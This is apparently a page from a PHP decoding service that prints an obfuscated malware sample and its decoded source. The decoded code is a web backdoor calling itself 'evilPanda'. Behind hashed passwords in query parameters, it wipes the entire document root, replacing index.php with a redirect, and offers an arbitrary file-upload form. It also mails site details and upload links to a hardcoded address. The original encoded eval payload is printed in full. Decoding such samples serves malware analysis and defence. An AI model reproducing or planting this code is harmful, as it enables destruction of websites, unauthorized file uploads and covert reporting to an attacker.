Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
preg_replace("/.*/e","\x65"."\x76"."\x61"."\x6C"."\x28"."\x67"."\x7A"."\x69"."\x6E"."\x66"..
Decoded Output download
session_start();
set_time_limit(0);
header("Content-Type: text/html; charset=utf-8");
$v = "0.25";
$script_link = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$expl = 'aaf561f0cafb68cdc79db4dba183cd2b';
$upl = '35d70d1153ee96d2aaa59a0e99dd5ca7';
$mails = array('[email protected]');
$pingFileName = '.date';
$site_domine=$_SERVER['HTTP_HOST'];
if(isset($_GET['metrika'])&&$_GET['metrika']=='sendstatistic'){
$date = date('d/m/Y');
if(file_exists($pingFileName)){
if(strpos(file_get_contents($pingFileName), $date)!==false) return;
}
file_put_contents($pingFileName, $date.PHP_EOL, FILE_APPEND);
mailInfo(5);
}
else if(isset($_GET['expl'])&&md5($_GET['expl'])==$expl){mailInfo(3);remAll($_SERVER['DOCUMENT_ROOT']);}
else if(isset($_GET['upl'])&&md5($_GET['upl'])==$upl){
$infoMessage="";
if(isset($_POST["load"]))saveFiles(dirname($_SERVER['SCRIPT_FILENAME']),$_FILES["files"]);
if(isset($_SESSION["savedFilesInfo"])){
$filesInfo=$_SESSION["savedFilesInfo"];
unset($_SESSION["savedFilesInfo"]);
$infoMessage="<ul>";
foreach($filesInfo as $k=>$fileInfo){
$message=$fileInfo['message'];
$infoMessage.='<li>'.$message.'</li>';
}
$infoMessage.="</ul>";
}
echo '<!doctype html><html lang="ru"><head><meta charset="UTF-8"/></head><form name="upload" method="post" enctype="multipart/form-data" action=""> : <input id="file-field" type="file" name="files[]" value=" " multiple="true"><input type="submit" name="load" value="">
</form><p>'.$infoMessage.'</p></html>';
die;
}
else if(count($_GET)>0)mailInfo(2);
else mailInfo(1);
die;
//
function mailInfo($code, $link=""){
global $script_link, $mails, $site_domine;
$from='evilPanda';
$message=" evilPanda $script_link : ";
switch ($code){
case 1: $message.=" "; break;
case 2: $message.=" -"; break;
case 3: $message.=" http://$site_domine "; break;
case 4: $message.=" http://$site_domine $link "; break;
case 5: $message.="pingWin "; $from='pingWin'; break;
default:$message.=" ";
}
$from.="@$site_domine";
$headers="From: $from
Reply-to: $from
Content-type: text/html; charset=utf-8
";
foreach($mails as $mail){mail($mail,' evilPanda',$message,$headers);}
}
function remAll($dir){
$all=scandir($dir);
foreach($all as $v) if($v!=='.'&&$v!=='..') $new_all[]="$dir/$v";
unset($all);
for($i=0; $i<count($new_all); $i++){
if(is_dir($new_all[$i])) remAll($new_all[$i]);
else unlink($new_all[$i]);
}
if($dir!=$_SERVER['DOCUMENT_ROOT']) rmdir($dir);
else{
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/index.php','<?php Header("Location: http://ya.ru/"); die;');
header("Location: /");
die;
}
}
function saveFiles($dir, $files){
global $script_link;
foreach($files as $key=>$item) for($i=0;count($item)>$i;$i++) $reFiles[$i][$key]=$item[$i];
$files=$reFiles;
unset($reFiles);
foreach($files as $k=>$file){
$name=getName($dir,$file["name"]);
$uploadfile="$dir/$name";
$link=$script_link;
$link=substr($link,0,strlen($link)-strlen(strrchr($link,"/"))+1);
$link.=$name;
if(empty($file["size"])) $_SESSION['savedFilesInfo'][$k]['message']=" ";
else if(move_uploaded_file($file["tmp_name"], $uploadfile)){
$_SESSION['savedFilesInfo'][$k]['message']=' <a target="_blank" href="'.$link.'">'.$link.'</a> ';
mailInfo(4, $link);
}
else $_SESSION['savedFilesInfo'][$k]['message']=" $name. .";
}
header("Location: $script_link?$_SERVER[QUERY_STRING]");
die;
}
function getName($dir,$filename){
$ext=strrchr($filename, ".");
$name=substr($filename, 0, strlen($filename)-strlen($ext));
$name=strtr($name, array(''=>'a',''=>'b',''=>'v',''=>'g',''=>'d',''=>'e',''=>'e',''=>'zh',''=>'z',''=>'i',''=>'y',''=>'k',''=>'l',''=>'m',''=>'n',''=>'o',''=>'p',''=>'r',''=>'s',''=>'t',''=>'u',''=>'f',''=>'h',''=>'c',''=>'ch',''=>'sh',''=>'sch',''=>'\'',''=>'y',''=>'\'',''=>'e',''=>'yu',''=>'ya',''=>'A',''=>'B',''=>'V',''=>'G',''=>'D',''=>'E',''=>'E',''=>'Zh',''=>'Z',''=>'I',''=>'Y',''=>'K',''=>'L',''=>'M',''=>'N',''=>'O',''=>'P',''=>'R',''=>'S',''=>'T',''=>'U',''=>'F',''=>'H',''=>'C',''=>'Ch',''=>'Sh',''=>'Sch',''=>'\'',''=>'Y',''=>'\'',''=>'E',''=>'Yu',''=>'Ya',));
$name=strtolower($name);
$name=preg_replace('~[^-a-z0-9_]+~u','-',$name);
$name=trim($name,"-");
if(!file_exists("$dir/".$name.$ext)){
$name.=$ext;
return $name;
}
else{
$name.='1'.$ext;
return getName($dir,$name);
}
}Did this file decode correctly?
Original Code
preg_replace("/.*/e","\x65"."\x76"."\x61"."\x6C"."\x28"."\x67"."\x7A"."\x69"."\x6E"."\x66"."\x6C"."\x61"."\x74"."\x65"."\x28"."\x62"."\x61"."\x73"."\x65"."\x36"."\x34"."\x5F"."\x64"."\x65"."\x63"."\x6F"."\x64"."\x65"."\x28'"."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"."'\x29"."\x29"."\x29"."\x3B",".", 1);Function Calls
| gzinflate | 2 |
| preg_replace | 1 |
| base64_decode | 2 |
Stats
| MD5 | ed053308a6ed33a49d32e229aa2b3d73 |
| Eval Count | 3 |
| Decode Time | 101 ms |